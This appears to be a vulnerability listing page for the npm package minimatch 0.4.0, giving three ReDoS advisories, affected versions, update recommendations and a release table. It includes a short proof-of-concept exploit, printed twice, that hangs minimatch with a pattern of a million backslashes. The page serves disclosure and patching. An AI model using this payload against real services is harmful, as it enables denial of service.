NodeJS/minimatch/0.4.0

a glob matcher in javascript

Repo Link: https://www.npmjs.com/package/minimatch
License: MIT

3 Security Vulnerabilities

minimatch ReDoS vulnerability

Published date: 2022-10-18T12:00:32Z

CVE: CVE-2022-3517

Links:

A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.

Affected versions: ["0.0.1", "0.0.2", "0.0.4", "0.0.5", "0.1.1", "0.1.2", "0.1.3", "0.1.4", "0.1.5", "0.2.0", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "0.2.8", "0.2.9", "0.2.10", "0.2.11", "0.2.12", "0.2.13", "0.2.14", "0.3.0", "0.4.0", "1.0.0", "2.0.0", "2.0.1", "2.0.2", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9", "2.0.10", "3.0.0", "3.0.2", "3.0.3", "3.0.4"]

Secure versions: [3.0.5, 3.0.6, 4.0.0, 4.1.0, 3.1.0, 3.1.1, 3.0.7, 4.1.1, 4.2.0, 4.2.1, 5.0.0, 3.1.2, 3.0.8, 5.0.1, 5.1.0, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 6.0.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.1.0, 6.1.1, 6.1.2, 5.1.5, 4.2.2, 6.1.3, 6.1.4, 5.1.6, 4.2.3, 6.1.5, 6.1.6, 6.1.7, 6.1.8, 6.1.9, 6.1.10, 6.2.0, 7.0.0, 7.0.1, 7.1.0, 7.1.1, 7.1.2, 7.1.3, 7.1.4, 7.2.0, 7.3.0, 7.4.0, 7.4.1, 7.4.2, 7.4.3, 7.4.4, 8.0.0, 8.0.1, 8.0.2, 7.4.5, 8.0.3, 8.0.4, 7.4.6, 9.0.0, 9.0.1, 9.0.2, 9.0.3, 9.0.4]

Recommendation: Update to version 9.0.4.

Regular Expression Denial of Service in minimatch

Published date: 2018-10-09T00:40:41Z

CVE: CVE-2016-10540

Links:

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

var minimatch = require(“minimatch”);

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = “”;
  for (i=0; i<=len; i++) {
    result = result + chr;
  }
  return result;
}

var exploit = “[!” + genstr(1000000, “\\”) + “A”;

// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);

Recommendation

Update to version 3.0.2 or later.

Recommendation: Update to version 9.0.4.

Regular Expression Denial of Service

Published date: 2016-06-20

CVSS Score: 7.5

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Coordinating vendor: ^Lift Security

Links:

https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) is vulnerable to ReDoS in the pattern parameter. This is because of the regular expression on line 521 of minimatch.js: /((?:\\{2})*)(\\?)\|/g,. The problematic portion of the regex is ((?:\\{2})*) which matches against \\.

A proof of concept is as follows: ``` var minimatch = require(“minimatch”);

// utility function for generating long strings var genstr = function (len, chr) { var result = “”; for (i=0; i<=len; i++) { result = result + chr; } return result; }

var exploit = “[!” + genstr(1000000, “\”) + “A”;

// minimatch exploit. console.log(“starting minimatch”); minimatch(“foo”, exploit); console.log(“finishing minimatch”); ```

Recommendation: Updated to version 3.0.2 or greater

107 Other Versions

Version	License	Security	Released
9.0.4	ISC		2024-03-28 - 19:42	28 days
9.0.3	ISC		2023-07-06 - 17:05	10 months
9.0.2	ISC		2023-06-23 - 21:12	10 months
9.0.1	ISC		2023-05-20 - 20:53	11 months
9.0.0	ISC		2023-04-09 - 22:15	about 1 year
8.0.4	ISC		2023-04-09 - 20:17	about 1 year
8.0.3	ISC		2023-04-03 - 16:51	about 1 year
8.0.2	ISC		2023-04-02 - 03:41	about 1 year
8.0.1	ISC		2023-04-02 - 03:39	about 1 year
8.0.0	ISC		2023-04-02 - 03:33	about 1 year
7.4.6	ISC		2023-04-09 - 20:18	about 1 year
7.4.5	ISC		2023-04-03 - 16:49	about 1 year
7.4.4	ISC		2023-04-01 - 23:44	about 1 year
7.4.3	ISC		2023-03-22 - 18:52	about 1 year
7.4.2	ISC		2023-03-01 - 20:13	about 1 year
7.4.1	ISC		2023-03-01 - 07:59	about 1 year
7.4.0	ISC		2023-03-01 - 06:59	about 1 year
7.3.0	ISC		2023-02-27 - 19:58	about 1 year
7.2.0	ISC		2023-02-26 - 09:13	about 1 year
7.1.4	ISC		2023-02-26 - 01:03	about 1 year
7.1.3	ISC		2023-02-25 - 02:07	about 1 year
7.1.2	ISC		2023-02-24 - 22:56	about 1 year
7.1.1	ISC		2023-02-24 - 00:36	about 1 year
7.1.0	ISC		2023-02-22 - 23:45	about 1 year
7.0.1	ISC		2023-02-22 - 02:01	about 1 year
7.0.0	ISC		2023-02-20 - 00:45	about 1 year
6.2.0	ISC		2023-02-13 - 08:58	about 1 year
6.1.10	ISC		2023-02-13 - 08:20	about 1 year
6.1.9	ISC		2023-02-13 - 06:54	about 1 year
6.1.8	ISC		2023-02-11 - 21:10	about 1 year
6.1.7	ISC		2023-02-11 - 20:33	about 1 year
6.1.6	ISC		2023-01-22 - 17:52	over 1 year
6.1.5	ISC		2023-01-17 - 22:17	over 1 year
6.1.4	ISC		2023-01-17 - 17:46	over 1 year
6.1.3	ISC		2023-01-17 - 17:24	over 1 year
6.1.2	ISC		2023-01-17 - 15:02	over 1 year
6.1.1	ISC		2023-01-17 - 14:57	over 1 year
6.1.0	ISC		2023-01-17 - 07:11	over 1 year
6.0.4	ISC		2023-01-16 - 01:55	over 1 year
6.0.3	ISC		2023-01-15 - 23:08	over 1 year
6.0.2	ISC		2023-01-15 - 21:26	over 1 year
6.0.1	ISC		2023-01-15 - 17:37	over 1 year
6.0.0	ISC		2023-01-14 - 21:07	over 1 year
5.1.6	ISC		2023-01-17 - 19:46	over 1 year
5.1.5	ISC		2023-01-17 - 15:04	over 1 year
5.1.4	ISC		2023-01-14 - 19:09	over 1 year
5.1.3	ISC		2023-01-14 - 18:54	over 1 year
5.1.2	ISC		2022-12-20 - 15:12	over 1 year
5.1.1	ISC		2022-11-29 - 20:33	over 1 year
5.1.0	ISC		2022-05-16 - 16:13	almost 2 years
5.0.1	ISC		2022-02-24 - 17:58	about 2 years
5.0.0	ISC		2022-02-15 - 16:50	about 2 years
4.2.3	ISC		2023-01-17 - 19:47	over 1 year
4.2.2	ISC		2023-01-17 - 15:09	over 1 year
4.2.1	ISC		2022-02-15 - 16:35	about 2 years
4.2.0	ISC		2022-02-15 - 16:03	about 2 years
4.1.1	ISC		2022-02-13 - 04:22	about 2 years
4.1.0	ISC		2022-02-13 - 00:58	about 2 years
4.0.0	ISC		2022-02-13 - 00:37	about 2 years
3.1.2	ISC		2022-02-15 - 20:32	about 2 years
3.1.1	ISC		2022-02-13 - 04:01	about 2 years
3.1.0	ISC		2022-02-13 - 01:03	about 2 years
3.0.8	ISC		2022-02-15 - 20:33	about 2 years
3.0.7	ISC		2022-02-13 - 04:03	about 2 years
3.0.6	ISC		2022-02-12 - 23:58	about 2 years
3.0.5	ISC		2022-02-06 - 20:28	about 2 years
3.0.4	ISC	1	2017-05-07 - 18:11	almost 7 years
3.0.3	ISC	1	2016-08-08 - 17:45	over 7 years
3.0.2	ISC	1	2016-06-17 - 20:13	almost 8 years
3.0.0	ISC	3	2015-09-27 - 18:18	over 8 years
2.0.10	ISC	3	2015-07-23 - 01:51	almost 9 years
2.0.9	ISC	3	2015-07-18 - 23:03	almost 9 years
2.0.8	ISC	3	2015-05-19 - 01:38	almost 9 years
2.0.7	MIT	3	2015-04-29 - 15:43	almost 9 years
2.0.6	MIT	3	2015-04-29 - 15:25	almost 9 years
2.0.5	MIT	3	2015-04-29 - 14:37	almost 9 years
2.0.4	MIT	3	2015-03-12 - 17:34	about 9 years
2.0.3	MIT	3	2015-03-10 - 02:03	about 9 years
2.0.2	MIT	3	2015-03-10 - 00:34	about 9 years
2.0.1	MIT	3	2014-12-01 - 16:30	over 9 years
2.0.0	MIT	3	2014-12-01 - 02:12	over 9 years
1.0.0	MIT	3	2014-07-28 - 21:29	over 9 years
0.4.0	MIT	3	2014-07-11 - 23:25	almost 10 years
0.3.0	MIT	3	2014-05-13 - 00:47	almost 10 years
0.2.14	MIT	3	2013-12-16 - 22:01	over 10 years
0.2.13	MIT	3	2013-12-16 - 06:02	over 10 years
0.2.12	MIT	3	2013-04-12 - 19:28	about 11 years
0.2.11	MIT	3	2013-02-25 - 16:23	about 11 years
0.2.10	MIT	3	2013-02-25 - 16:21	about 11 years
0.2.9	MIT	3	2012-10-25 - 15:34	over 11 years
0.2.8	MIT	3	2012-10-25 - 15:24	over 11 years
0.2.7	MIT	3	2012-10-04 - 03:49	over 11 years
0.2.6	MIT	3	2012-08-13 - 16:42	over 11 years
0.2.5	MIT	3	2012-06-04 - 20:57	almost 12 years
0.2.4	MIT	3	2012-03-29 - 01:48	about 12 years
0.2.3	MIT	3	2012-03-29 - 01:37	about 12 years
0.2.2	MIT	3	2012-03-22 - 05:22	about 12 years
0.2.0	MIT	3	2012-02-22 - 11:04	about 12 years
0.1.5	MIT	3	2012-02-04 - 19:32	about 12 years
0.1.4	MIT	3	2012-01-19 - 00:14	over 12 years